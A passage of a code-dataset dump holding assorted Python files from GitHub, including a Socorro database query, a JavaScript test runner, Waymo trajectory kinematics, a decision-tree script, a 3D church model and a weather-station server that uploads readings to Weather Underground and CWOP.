i1.release_version = i2.release_version\n AND i1.build_type = i2.build_type\n )\n WHERE %(rapid_beta_filters)s\n ORDER BY i1.version_sort\n \"\"\" % {\n \"product_filters\": \" OR \".join(where_product),\n \"rapid_beta_filters\": \" OR \".join(where_rapid_beta),\n }\n\n error_message = \"Failed to retrieve versions data from PostgreSQL\"\n results = self.query(sql, params, error_message=error_message)\n\n res = {}\n for row in results:\n version = dict(zip((\n \"product_version_id\",\n \"product_name\",\n \"version_string\",\n \"major_version\",\n \"release_channel\",\n \"build_id\",\n \"is_rapid_beta\",\n \"is_from_rapid_beta\",\n \"from_beta_version\",\n \"version_sort\",\n ), row))\n\n key = \":\".join((\n version[\"product_name\"],\n version[\"version_string\"]\n ))\n\n del version[\"version_sort\"] # no need to send this back\n\n if key in res:\n # That key already exists, just add it the new buildid\n res[key][\"build_id\"].append(int(version[\"build_id\"]))\n else:\n if version[\"build_id\"]:\n version[\"build_id\"] = [int(version[\"build_id\"])]\n\n res[key] = version\n\n return res\n","repo_name":"lienduo/OSS","sub_path":"CrashDump/socorro-master/socorro/external/postgresql/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5728,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"36031374250","text":"import json\nimport os\nimport lxml\nimport tempfile\nimport shutil\nimport subprocess\nimport unittest\nimport warnings\n\nfrom zope.interface.interfaces import IInterface\nfrom silva.fanstatic.extending import INTERFACES_RESOURCES\n\n\n@apply\ndef HAVE_BUSTER():\n try:\n process = subprocess.Popen(\n ['buster', '--version'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n except OSError as error:\n if error.args[0] == 2:\n return False\n return stdout.startswith('Buster.JS')\n\n\nclass BusterTestCase(unittest.TestCase):\n \"\"\"A buster test case to run Javascript tests.\n \"\"\"\n\n def __init__(self, filename, sources=None, name=None):\n unittest.TestCase.__init__(self)\n self._filename = filename\n self._sources = None\n self._name = name\n self._path = None\n if sources is not None:\n self.sources = sources\n\n @apply\n def sources():\n\n def setter(self, sources):\n if sources is None:\n self._sources = None\n return\n assert IInterface.providedBy(sources), 'Invalid source specifier.'\n self._sources = sources\n if not self._name:\n self._name = sources.__identifier__.split('.')[-1]\n\n def getter(self):\n if self._sources is not None:\n group = INTERFACES_RESOURCES.get(self._sources.__identifier__)\n if group is not None:\n for resource in sorted(group.resources):\n stack = [resource.library.path]\n if resource.dirname:\n stack.append(resource.dirname)\n stack.append(resource.filename)\n yield os.path.join(*stack)\n\n return property(getter, setter)\n\n def _writeConfiguration(self, directory):\n with open(os.path.join(directory, 'buster.js'), 'w') as handle:\n handle.write(\"\"\"\n// Generated configuration\nvar config = module.exports;\n\"\"\")\n handle.write(\"\"\"\nconfig[\"{name}\"] = {{\n rootPath: \"/\",\n environment: \"browser\",\n sources: {sources},\n tests: [\"{filename}\"]\n}};\n\"\"\".format(name=self._name,\n sources=json.dumps(list(self.sources)),\n filename=self._filename))\n\n def setUp(self):\n self._path = tempfile.mkdtemp()\n self._writeConfiguration(self._path)\n\n def runTest(self):\n if not HAVE_BUSTER:\n warnings.warn(\n u\"Buster is not installed.\",\n UserWarning)\n raise unittest.SkipTest()\n process = subprocess.Popen(\n ['buster', 'test', '-r', 'xml'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd=self._path)\n stdout, stderr = process.communicate()\n if stderr:\n raise self.failureException(stderr)\n if not stdout:\n warnings.warn(\n u\"Buster server is not running.\",\n UserWarning)\n raise unittest.SkipTest()\n root = lxml.etree.fromstring(stdout)\n for testsuite in root.getchildren():\n assert testsuite.tag == 'testsuite'\n for testcase in testsuite.getchildren():\n assert testcase.tag == 'testcase'\n failures = testcase.xpath('//failure')\n if len(failures):\n raise self.failureException(\n \"Test %s (%s) failed:\\n%s\" % (\n testcase.attrib['name'],\n testcase.attrib['classname'],\n '\\n'.join(\n map(lambda f: \"{type}: {message}\".format(\n type=f.attrib['type'],\n message=f.attrib['message']),\n failures))))\n\n def tearDown(self):\n try:\n shutil.rmtree(self._path)\n self._path = None\n except:\n pass\n\n def id(self):\n return self._name\n\n def __eq__(self, other):\n if not isinstance(other, self.__class):\n raise TypeError\n return other._filename == self._filename\n\n def __ne__(self, other):\n if not isinstance(other, self.__class):\n raise TypeError\n return other._filename != self._filename\n\n def __hash__(self):\n return hash(self._filename)\n\n def __str__(self):\n return self._filename\n\n def shortDescription(self):\n return 'Buster tests: ' + self._filename\n\n\ntry:\n import infrae.testing.testcase\nexcept ImportError:\n pass\nelse:\n infrae.testing.testcase.TEST_FACTORIES['.js'] = BusterTestCase\n","repo_name":"silvacms/silva.ui","sub_path":"src/silva/ui/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14162346660","text":"from typing import Tuple, Union\nimport numpy as np\nimport tensorflow as tf\n\n\ndef one_step_diff(\n t: tf.Tensor, prepend_value: Union[float, bool]) -> tf.Tensor:\n \"\"\"Computes the 1-step discrete difference along the last axis.\n\n This function is used to compute 1st and 2nd order derivatives of time-series.\n\n Args:\n t: A float Tensor of shape [..., steps].\n prepend_value: To maintain the original tensor shape, this value is\n prepended once to the 1-step difference.\n\n Returns:\n A Tensor of shape [..., steps] containing the 1-step differences, prepended\n with `prepend_value`.\n \"\"\"\n # Prepare the tensor containing the value(s) to prepend.\n prepend_shape = (*t.shape[:-1], 1)\n prepend_tensor = tf.fill(prepend_shape, prepend_value)\n return tf.concat([prepend_tensor, tf.experimental.numpy.diff(t)], axis=-1)\n\n\ndef compute_displacement_error(\n x: tf.Tensor, y: tf.Tensor, z: tf.Tensor,\n ref_x: tf.Tensor, ref_y: tf.Tensor, ref_z: tf.Tensor) -> tf.Tensor:\n \"\"\"Computes displacement error (in x,y,z) w.r.t. a reference trajectory.\n\n Note: This operation doesn't put any constraint on the shape of the tensors,\n except that they are all consistent with each other, so this can be used\n with any arbitrary tensor shape.\n\n Args:\n x: The x-component of the predicted trajectories.\n y: The y-component of the predicted trajectories.\n z: The z-component of the predicted trajectories.\n ref_x: The x-component of the reference trajectories.\n ref_y: The y-component of the reference trajectories.\n ref_z: The z-component of the reference trajectories.\n\n Returns:\n A float tensor with the same shape as all the arguments, containing\n the 3D distance between the predicted trajectories and the reference\n trajectories.\n \"\"\"\n return tf.linalg.norm(\n tf.stack([x, y, z], axis=-1) - tf.stack([ref_x, ref_y, ref_z], axis=-1),\n ord='euclidean', axis=-1)\n\n\ndef compute_kinematic_features(\n x: tf.Tensor,\n y: tf.Tensor,\n z: tf.Tensor,\n heading: tf.Tensor,\n seconds_per_step: float\n) -> Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor]:\n \"\"\"Computes kinematic features (speeds and accelerations).\n\n Note: Everything is assumed to be valid, filtering must be done afterwards.\n To maintain the original tensor length, speeds are prepended with 1 np.nan,\n while accelerations with 2 np.nan.\n\n Args:\n x: A float tensor of shape (..., num_steps) containing x coordinates.\n y: A float tensor of shape (..., num_steps) containing y coordinates.\n z: A float tensor of shape (..., num_steps) containing z coordinates.\n heading: A float tensor of shape (..., num_steps,) containing heading.\n seconds_per_step: The duration (in seconds) of one step. This is used to\n scale speed and acceleration properly. This is always a positive value,\n usually defaulting to `submission_specs.STEP_DURATION_SECONDS`.\n\n Returns:\n A tuple containing the following 4 tensors:\n linear_speed: Magnitude of speed in (x, y, z). Shape (..., num_steps).\n linear_acceleration: Linear signed acceleration (changes in linear speed).\n Shape (..., num_steps).\n angular_speed: Angular speed (changes in heading). Shape (..., num_steps).\n angular_acceleration: Angular acceleration (changes in `angular_speed`).\n Shape (..., num_steps).\n \"\"\"\n # First order derivatives.\n dpos = one_step_diff(tf.stack([x, y, z], axis=0), prepend_value=np.nan)\n linear_speed = tf.linalg.norm(\n dpos, ord='euclidean', axis=0) / seconds_per_step\n dh = _wrap_angle(\n one_step_diff(heading, prepend_value=np.nan)) / seconds_per_step\n # Second order derivatives.\n linear_accel = one_step_diff(\n linear_speed, prepend_value=np.nan) / seconds_per_step\n d2h = _wrap_angle(one_step_diff(dh, prepend_value=np.nan)) / seconds_per_step\n return linear_speed, linear_accel, dh, d2h\n\n\ndef _wrap_angle(angle: tf.Tensor) -> tf.Tensor:\n \"\"\"Wraps angles in the range [-pi, pi].\"\"\"\n return (angle + np.pi) % (2 * np.pi) - np.pi\n","repo_name":"waymo-research/waymo-open-dataset","sub_path":"src/waymo_open_dataset/wdl_limited/sim_agents_metrics/trajectory_features.py","file_name":"trajectory_features.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","stars":2387,"dataset":"github-code","pt":"92"} +{"seq_id":"6577746570","text":"from sklearn.tree import DecisionTreeClassifier, plot_tree\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\ndataset = pd.read_csv('slr.csv')\r\nx = dataset.iloc[:,:-1].values\r\ny = dataset.iloc[:,1].values\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1, random_state=6)\r\nclf = DecisionTreeClassifier()\r\nclf.fit(x_train, y_train)\r\nc= clf.predict(x_test)\r\n\r\nacc = accuracy_score(y_test, c)\r\nprint(\"Accuraccy of Decision Tree:\",acc)\r\nplot_tree(clf, filled='color')\r\nplt.title(\"Decision Tree Classifier\")\r\nplt.show()","repo_name":"anayasusangeorge/labexam","sub_path":"prg2.py","file_name":"prg2.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"28725907220","text":"from pyplasm import *\n\n\ndef HEMISPHERE(radius):\n \"\"\"\n Hemisphere\n :param radius:\n :return:\n \"\"\"\n def HEMISPHERE1 (subds):\n N, M = subds\n domain = Plasm.translate( Plasm.power(INTERVALS(PI/2)(N), INTERVALS(2*PI)(M)), Vecf(0, -PI/2, 0))\n fx = lambda p: radius * math.cos(p[0]) * math.sin(p[1])\n fy = lambda p: radius * math.cos(p[0]) * math.cos(p[1])\n fz = lambda p: radius * math.sin(p[0])\n ret = MAP([fx, fy, fz])(domain)\n return ret\n return HEMISPHERE1\n\n\ndef church(base=1, numberOfColumns=8, ratio=.809):\n \"\"\"\n Returns a PyPlams object that models a church.\n :param base:\n :param ratio:\n :param numberOfColumns:\n :return:\n \"\"\"\n\n def centeredCuboid(a, b, c):\n \"\"\"\n Returns a centered CUBOID\n :param a:\n :param b:\n :param c:\n :return:\n \"\"\"\n return T([1, 2])([-float(b)/2, -float(b)/2])(CUBOID([a, b, c]))\n\n def getHemisphere():\n \"\"\"\n Returns an hemisphere\n :return:\n \"\"\"\n return R([1, 3])(-PI)(HEMISPHERE(1)([8, 8]))\n\n def arrangedCircularly(o, r, n=numberOfColumns):\n \"\"\"\n Arranges circularly a PyPlasm object\n :param o:\n :param r:\n :param n:\n :return:\n \"\"\"\n return STRUCT(map(lambda i: T([1, 2])([\n r*math.cos((2 * PI / n) * i),\n r*math.sin((2 * PI / n) * i)\n ])(R([1, 2])((2 * PI / n) * i)(o)), range(0, n)))\n\n def getCylinder():\n \"\"\"\n Returns a decorated and colored cylinder\n :return:\n \"\"\"\n c1 = \"#878787\"\n c2 = \"#afafaf\"\n c3 = \"#cecece\"\n c4 = \"#e8e8e8\"\n c5 = \"#5c1b1b\"\n return STRUCT([\n HEX(c1)(T(3)(ratio - .05)(CYLINDER([1.05, .05])(8))),\n HEX(c2)(T(3)(ratio - .1)(CYLINDER([1.025, .05])(8))),\n HEX(c3)(T(3)(ratio - .15)(CYLINDER([1.0125, .05])(8))),\n HEX(c4)(DIFFERENCE([\n CYLINDER([1, ratio - .15])(8),\n CYLINDER([.9, ratio - .15])(8),\n HEX(c5)(\n T(3)(.075)(R([1, 2])(PI / 8)(arrangedCircularly(centeredCuboid(.08, PI / 8, ratio - 0.3), 1.05, 8)))),\n ])),\n HEX(c5)(T(3)(.075)(R([1, 2])(PI / 8)(arrangedCircularly(centeredCuboid(.04, PI / 8, ratio - 0.3), 1.05, 8)))),\n ])\n\n def getColumn():\n \"\"\"\n Returns a cylinder with a hemisphere over it.\n :return:\n \"\"\"\n cylinder = getCylinder()\n return STRUCT([\n cylinder,\n HEX(\"#5C1B1B\")(T(3)(ratio)(getHemisphere()))\n ])\n\n def render():\n return STRUCT([\n\n # scalini\n T(3)(0.000)(S([1, 2])([1.00, 1.00])(CYLINDER([1, 0.025])(8))),\n T(3)(0.025)(S([1, 2])([0.95, 0.95])(CYLINDER([1, 0.025])(8))),\n T(3)(0.050)(S([1, 2])([0.90, 0.90])(CYLINDER([1, 0.025])(8))),\n\n # base\n T(3)(0.075)(S([1, 2, 3])([.85, .85, .85])(getCylinder())),\n\n # cupola centrale\n T(3)(0.075 + ratio * .85)(S([1, 2, 3])([.425, .425, .425])(getColumn())),\n\n # cupole laterali 0,2125\n T(3)(0.075 + ratio * .85)(arrangedCircularly(S([1, 2, 3])([.2125, .2125, .2125])(getColumn()), .425 + .2125)),\n\n ])\n\n return S([1, 2, 3])([base, base, base])(render())\n","repo_name":"romatre/ggpl","sub_path":"2017-11-06/lib/church.py","file_name":"church.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"32156811237","text":"from flask import Flask , render_template\nfrom retry import retry\nimport pika\nimport time\nimport json\nfrom code_challenge_base_predictor import Predictor\n\nprint(\"launching sciflask\",flush=True)\n\nclass ConsumePredictReturn():\n\tdef __init__(self,queue):\n\n\t\tself.queue = queue\n\t\tself.Model = Predictor()\n\t\tprint(\"running now\")\n\t\tself.Consume()\n\n\t# sends back the probabilities to a new queue probabilities return\n\tdef ReturnSignals(self,inputs, results):\n\t\tself.channel.basic_publish(exchange='',\n\t\t routing_key='probabilities_return',\n\t\t body=json.dumps(inputs.extend(list(results[0]))))\n\t\tprint(\"returned prob..{}\".format(inputs))\n\n\t# on consume, take in data, run through model, return signal, deliver Ack\t\n\tdef callback(self,ch,method,properties,body):\n\t\tinputs = json.loads(body)\n\t\tresults = self.Model.predict(json.loads(body))\n\t\tself.ReturnSignals(inputs, results)\n\t\tch.basic_ack(delivery_tag = method.delivery_tag)\n\n\t\t\n\t\n\t# Try Connecting and consuming data from queue,\n\t#retry handles race condition makes code a tiny bit more robust. \n\t@retry(pika.exceptions.AMQPConnectionError, delay=5,jitter=(1,3))\n\tdef Consume(self):\n\n\t\tcredentials = pika.PlainCredentials('rabbitmq', 'rabbitmq')\n\t\tself.connection = pika.BlockingConnection(pika.ConnectionParameters('rabbit1',5672,'/',credentials))\n\t\tself.channel = self.connection.channel()\n\t\tself.channel.queue_declare(queue = self.queue)\n\t\tself.channel.queue_declare(queue = 'probabilities_return')\n\t\tself.channel.basic_consume(queue=self.queue,on_message_callback=self.callback)\n\t\ttry:\n\t\t\tself.channel.start_consuming()\n\t\texcept KeyboardInterrupt:\n\t\t\tself.channel.stop_consuming()\n\t\t\tself.connection.close()\n\t\texcept pika.exceptions.ConnectionClosedByBroker:\n\t\t\tpass\n\nConsumePredictReturn('queue1')\n\n#app = Flask(__name__)\n\t#\n\t#@app.route('/')\n\t#def home():\n\t#\treturn render_template('template.html',my_string=log)\n\t#\n\n\t#app.run(debug=True,host='0.0.0.0')","repo_name":"MatthewLennie/BayesProject","sub_path":"SciFlask/Hello.py","file_name":"Hello.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"3912166227","text":"#!/usr/bin/python3 \n\n# Open source weather station for ERC Altiplano, based on an Arduino Uno\n# Server-side code\n# (c)2018-2019, Levien van Zon (levien at gnuritas .org)\n# Further information: \n# http://gnuritas.org/weatherstation.html\n# https://github.com/lvzon/weatherstation\n\nfrom datetime import datetime\nimport select\n\n# Bind to localhost, port 9000\nHOST, PORT = \"\", 9000\n\n# CWOP station ID, password and location\ncwop_station = 'BLA'\ncwop_pass = '-1'\n# Attention, format of the location is bit special. Although there is a dot, the values are in degrees, minutes and seconds!\ncwop_position = '9999.99N/88888.88W_'\n\n# Weather Underground user and password\nwu_station = 'BLA'\nwu_password = 'blabla'\n\n# Variables sent by the Arduino weather station\n\nvars=['start','duration','T_mean','T_min','T_max','RH_mean','RH_min','RH_max','rain_mm','rain_mm_sum','wind_mean','wind_min','wind_max','winddir_mean','winddir_max','I_mean','runtime_s','pressure_mbar','T_soil']\n\n# Open your data output file\n\ncsv = open('weatherdata.csv', 'a')\n#print('servertime,start,duration,T_mean,T_min,T_max,RH_mean,RH_min,RH_max,rain_mm,rain_mm_sum,wind_mean,wind_min,wind_max,winddir_mean,winddir_max,I_mean', file=csv)\n\n# Open additional files for dumping Weather Underground URLs and invalid data \n\nurls = open('wu_urls.txt', 'a')\ninvalid = open('invalid_data.txt', 'a')\n\ndef C_to_F (celsius):\n return round(9.0 / 5.0 * celsius + 32, 2)\n\ndef kmh_to_mph (kmh):\n return round(kmh / 1.60934, 2)\n\ndef mm_to_inch (mm):\n return round(mm / 25.4, 2)\n\ndir_to_degrees = {'N': 0,'NE': 45,'E': 90,'SE': 135,'S': 180,'SW': 225,'W': 270,'NW': 315, 'NA': None}\n\nimport math\n\ndef get_dew_point_c(t_air_c, rel_humidity):\n \"\"\"Compute the dew point in degrees Celsius\n :param t_air_c: current ambient temperature in degrees Celsius\n :type t_air_c: float\n :param rel_humidity: relative humidity in %\n :type rel_humidity: float\n :return: the dew point in degrees Celsius\n :rtype: float\n \"\"\"\n # Source: https://gist.github.com/sourceperl/45587ea99ff123745428\n A = 17.27\n B = 237.7\n alpha = ((A * t_air_c) / (B + t_air_c)) + math.log(rel_humidity/100.0)\n return (B * alpha) / (A - alpha)\n\n\nimport urllib.request\n\ndef generate_wureq (valdict):\n \n ts = valdict['servertime']\n dateutc = datetime.utcfromtimestamp(ts).strftime(\"%Y-%m-%d+%H%%3A%M%%3A%S\") # [YYYY-MM-DD HH:MM:SS (mysql format)] In Universal Coordinated Time (UTC) Not local time\n tempf = str(C_to_F(valdict['T_mean'])) # [F outdoor temperature] \n humidity = str(valdict['RH_mean']) # [% outdoor humidity 0-100%]\n dailyrainin = str(mm_to_inch(valdict['rain_mm_sum'])) # [rain inches so far today in local time]\n windspdmph_avg2m = str(kmh_to_mph(valdict['wind_mean'])) # [mph 2 minute average wind speed mph]\n winddir_avg2m = str(valdict['winddir_mean']) # [0-360 2 minute average wind direction]\n windgustmph_10m = str(kmh_to_mph(valdict['wind_max'])) # [mph past 10 minutes wind gust mph ]\n \n wind_max_deg = dir_to_degrees[valdict['winddir_max']]\n windgustdir_10m = str(wind_max_deg) # [0-360 past 10 minutes wind gust direction]\n\n dewptf = str(C_to_F(get_dew_point_c(valdict['T_mean'], valdict['RH_mean'])))\n\n paramstr = 'ID=' + wu_station + '&PASSWORD=' + wu_password + '&dateutc=' + dateutc + '&tempf=' + tempf + '&humidity=' + humidity + '&dewptf=' + dewptf + '&dailyrainin=' + dailyrainin + '&windspeedmph=' + windspdmph_avg2m + '&winddir=' + winddir_avg2m + '&windgustmph=' + windgustmph_10m\n \n if wind_max_deg is not None:\n paramstr = paramstr + '&windgustdir=' + windgustdir_10m\n \n return 'https://weatherstation.wunderground.com/weatherstation/updateweatherstation.php?' + paramstr\n\n\nimport sys, os, time\nfrom datetime import datetime, timedelta\nfrom socket import *\n\ncwop_host = 'cwop.aprs.net'\ncwop_port = 14580\ncwop_address = cwop_station + '>APRS,TCPIP*:'\n\ndef make_aprs_wx(wind_dir=None, wind_speed=None, wind_gust=None, temperature=None, rain_last_hr=None, rain_last_24_hrs=None, rain_since_midnight=None, humidity=None, pressure=None):\n # Assemble the weather data of the APRS packet\n def str_or_dots(number, length):\n # If parameter is None, fill with dots, otherwise pad with zero\n if number is None:\n return '.'*length\n else:\n format_type = {\n 'int': 'd',\n 'float': '.0f',\n }[type(number).__name__]\n return ''.join(('%0',str(length),format_type)) % number\n return '%s/%sg%st%sr%sp%sP%sh%sb%s' % (\n str_or_dots(wind_dir, 3),\n str_or_dots(wind_speed, 3),\n str_or_dots(wind_gust, 3),\n str_or_dots(temperature, 3),\n str_or_dots(rain_last_hr, 3),\n str_or_dots(rain_last_24_hrs, 3),\n str_or_dots(rain_since_midnight, 3),\n str_or_dots(humidity, 2),\n str_or_dots(pressure, 5),\n )\n\n\ndef cwop_send_packet(valdict):\n\n rh = valdict['RH_mean']\n if rh > 99.9:\n rh = 99.9\n\n ts = valdict['servertime']\n # Attention, temperature in Fahrenheit!\n fahrenheit = C_to_F(valdict['T_mean'])\n humidity = rh\n # Attention, barometric pressure in tenths of millibars/tenths of hPascal!\n #pressure = press[2][0][1] * 10\n pressure = valdict['pressure_mbar'] * 10\n \n # If you have wind and rain data, get it here. Be aware that values are required in mph and in hundredths of an inch!\n wind_degrees = dir_to_degrees[valdict['winddir_max']]\n wind_mph = kmh_to_mph(valdict['wind_mean'])\n wind_gust_mph = kmh_to_mph(valdict['wind_max'])\n precip_today_in = mm_to_inch(valdict['rain_mm_sum'])\n \n # Prepare the data, which will be sent\n wx_data = make_aprs_wx(wind_degrees, wind_mph, wind_gust_mph, fahrenheit, None, None, precip_today_in * 100.0, humidity, pressure)\n # Use UTC\n utc_datetime = datetime.utcfromtimestamp(ts)\n # Create socket and connect to server\n sSock = socket(AF_INET, SOCK_STREAM)\n sSock.connect((cwop_host, cwop_port))\n # Log on\n sSock.send(b'user ' + cwop_station + ' pass ' + cwop_pass + ' vers Python\\n')\n # Send packet\n packetstr = cwop_address + '@' + utc_datetime.strftime(\"%d%H%M\") + 'z' + cwop_position + wx_data + 'Arduino\\n'\n sSock.send(packetstr.encode('ascii'))\n # Close socket, must be closed to avoid buffer overflow\n sSock.shutdown(0)\n sSock.close()\n \n\ndef decode_line(line):\n \n vals = line.rstrip().split(',')\n \n if (len(vars) == len(vals)):\n \n valdict = dict(zip(vars, vals))\n for key, value in valdict.items():\n try:\n num = float(value)\n valdict[key] = num\n except ValueError:\n pass\n \n ts = valdict['start']\n \n try:\n \n valdict['servertime'] = int(datetime.now().timestamp())\n #valdict['servertime'] = int(valdict['start'] + valdict['duration'])\n \n print(datetime.utcfromtimestamp(ts))\n print(valdict)\n \n url = generate_wureq(valdict)\n print(url, file=urls)\n contents = urllib.request.urlopen(url).read()\n \n cwop_send_packet(valdict)\n \n return str(valdict['servertime']) + ',' + line\n \n except:\n pass\n \n print(\"invalid line\")\n print(line, file=invalid)\n\n return None\n\n\ndef read_line(fd, timeout):\n \n inputs = [fd]\n \n chars = []\n line = ''\n failed = 0\n \n readable, writable, exceptional = select.select(inputs, [], inputs, timeout)\n while readable and failed < timeout and len(chars) and chars[-1] != '\\n':\n \n if not (readable or writable or exceptional):\n print('1-second time-out')\n failed += 1\n continue \n \n for s in readable:\n char = s.recv(1)\n chars.append(char)\n line = ''.join(chars)\n print('Received char', char, 'and appended to line:', line)\n \n readable, writable, exceptional = select.select(inputs, [], inputs, 1)\n\n if len(chars) and chars[-1] == '\\n':\n print('Line received:', line)\n return line\n else:\n print('No line received:', line)\n print(line, file=invalid)\n return None\n \n \n \nimport socketserver\n\nclass MyTCPHandler(socketserver.StreamRequestHandler):\n\n def handle(self):\n # self.rfile is a file-like object created by the handler;\n # we can now use e.g. readline() instead of raw recv() calls\n #try:\n #line = self.rfile.readline()\n \n inputs = [self.rfile]\n timeout = 60\n readable, writable, exceptional = select.select(inputs, [], inputs, timeout)\n \n if not (readable or writable or exceptional):\n print('Timed out while waiting for data on socket')\n return \n \n #line = read_line(self.rfile, 30)\n line = self.rfile.readline()\n \n while line:\n \n print(\"Data received from {}:\".format(self.client_address[0]))\n try:\n line = line.decode('utf_8')\n csvline = decode_line(line)\n if csvline:\n csv.write(csvline)\n except:\n print('invalid data received')\n print(line, file=invalid)\n\n #line = read_line(self.rfile, 30)\n line = self.rfile.readline()\n\nif __name__ == \"__main__\":\n\n # Create the server, binding to localhost\n server = socketserver.TCPServer((HOST, PORT), MyTCPHandler)\n\n # Activate the server; this will keep running until you\n # interrupt the program with Ctrl-C\n server.serve_forever()\n\n\ncsv.close()\n\n","repo_name":"lvzon/weatherstation","sub_path":"weatherstation-server.py","file_name":"weatherstation-server.py","file_ext":"py","file_size_in_byte":9783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"11126853914","text":"import pickle\r\nfrom xai.compiler.base import Configuration, Controller\r\nimport os\r\nfrom pprint import pprint\r\nimport numpy as np\r\n\r\nnp.random.seed(123456)\r\n\r\nroot_path = '/training'\r\n\r\nif __name__ == '__main__':\r\n pprint(\"Entered explainer step\")\r\n with open('{}/input/train.pickle'.format(root_path), 'rb') as f:\r\n X_train, y_train = pickle.load(f)\r\n\r\n with open('{}/input/model.pickle'.format(root_path), 'rb') as f:\r\n clf = pickle.load(f)\r\n\r\n with open('{}/input/func.pickle'.format(root_path), 'rb') as f:\r\n clf_fn = pickle.load(f)\r\n\r\n feature_names = X_train.columns.tolist()\r\n feature_importance_algorithm = \"shap\"\r\n learning_type = os.environ['LEARNING_TYPE']\r\n domain_type = os.environ['DOMAIN_TYPE']\r\n model_interpretor_algorithm = os.environ['MODEL_INTERPRETOR_ALG']\r\n model_explainer_algorithm = os.environ['MODEL_EXPLAINER_ALG']\r\n target_names_list =['good', 'bad']\r\n model_interpretor_strategy = os.environ['MODEL_INTERPRETOR_STRATEGY']\r\n model_interpret_k_value = int(os.environ['MODEL_INTERPRETOR_K_VALUE']) \r\n pprint(\"Learning_type = \" + learning_type)\r\n pprint(\"Domain_type = \" + domain_type)\r\n\r\n model_interpret_top_value = 8\r\n num_of_class = 2\r\n json_config = 'basic-report-explainable.json'\r\n controller = Controller(config=Configuration(json_config, locals()))\r\n pprint(controller.config)\r\n controller.render()\r\n pprint(\"Completed explainer step\")\r\n","repo_name":"manduripramodh/argoworkflows","sub_path":"steps/explanability.py","file_name":"explanability.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31274475177","text":"from math import cos, pi, sin\n\n\ndef chunks(lst, n):\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\n for i in range(0, len(lst), n):\n yield lst[i : i + n]\n\n\ndef print_hex(data: bytes):\n per_row = 16\n per_split = 8\n\n for i in range(0, len(data), per_row):\n chunk = data[i : i + per_row]\n\n adr = f\"{i:04x}\"\n char_values = [chr(b) if b >= 32 and b < 128 else \".\" for b in chunk]\n\n splits = [c for c in chunks(chunk, per_split)]\n\n hex_splits = [\" \".join([f\"{b:02X}\" for b in spl]) for spl in splits]\n hex_values = \" \".join(hex_splits)\n\n char_values = \"\".join(char_values)\n pad1 = \" \" * ((per_row - len(chunk)) % per_row)\n pad2 = \" \" * (per_row // per_split - len(splits))\n\n print(f\"{adr}: {hex_values}{pad1}{pad2} {char_values}\")\n\n\ndef print_header(hdr: str, underline: str = \"-\"):\n print(f\"{hdr}\\n{underline * len(hdr)}\")\n\n\ndef rotate(x: float, y: float, angle: float):\n dx = cos(angle) * x - sin(angle) * y\n dy = sin(angle) * x + cos(angle) * y\n return dx, dy\n\n\ndef d2r(degrees: float):\n return degrees * (pi / 180.0)\n","repo_name":"jomag/vargtass","sub_path":"vargtass/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31548537579","text":"from datetime import datetime\n\nfrom scripts.files.files_helper import get_file_name_from_path\nfrom scripts.stac.imagery.collection import ImageryCollection\nfrom scripts.stac.imagery.item import ImageryItem\nfrom scripts.stac.imagery.metadata_constants import CollectionTitleMetadata\n\n\ndef test_imagery_stac_item(mocker) -> None: # type: ignore\n # mock functions that interact with files\n geometry = {\n \"type\": \"Polygon\",\n \"coordinates\": [[[1799667.5, 5815977.0], [1800422.5, 5815977.0], [1800422.5, 5814986.0], [1799667.5, 5814986.0]]],\n }\n bbox = (1799667.5, 5815977.0, 1800422.5, 5814986.0)\n checksum = \"1220cdef68d62fb912110b810e62edc53de07f7a44fb2b310db700e9d9dd58baa6b4\"\n mocker.patch(\"scripts.stac.util.checksum.multihash_as_hex\", return_value=checksum)\n\n path = \"./test/BR34_5000_0302.tiff\"\n id_ = get_file_name_from_path(path)\n start_datetime = \"2021-01-27 00:00:00Z\"\n end_datetime = \"2021-01-27 00:00:00Z\"\n\n item = ImageryItem(id_, path)\n item.update_spatial(geometry, bbox)\n item.update_datetime(start_datetime, end_datetime)\n # checks\n assert item.stac[\"id\"] == id_\n assert item.stac[\"properties\"][\"start_datetime\"] == start_datetime\n assert item.stac[\"properties\"][\"end_datetime\"] == end_datetime\n assert item.stac[\"properties\"][\"datetime\"] is None\n assert item.stac[\"geometry\"][\"coordinates\"] == geometry[\"coordinates\"]\n assert item.stac[\"geometry\"] == geometry\n assert item.stac[\"bbox\"] == bbox\n assert item.stac[\"assets\"][\"visual\"][\"file:checksum\"] == checksum\n assert {\"rel\": \"self\", \"href\": f\"./{id_}.json\", \"type\": \"application/json\"} in item.stac[\"links\"]\n\n\ndef test_imagery_add_collection(mocker) -> None: # type: ignore\n metadata: CollectionTitleMetadata = {\n \"category\": \"Urban Aerial Photos\",\n \"region\": \"auckland\",\n \"gsd\": \"0.3m\",\n \"start_datetime\": datetime(2022, 2, 2),\n \"end_datetime\": datetime(2022, 2, 2),\n \"lifecycle\": \"completed\",\n \"location\": None,\n \"event\": 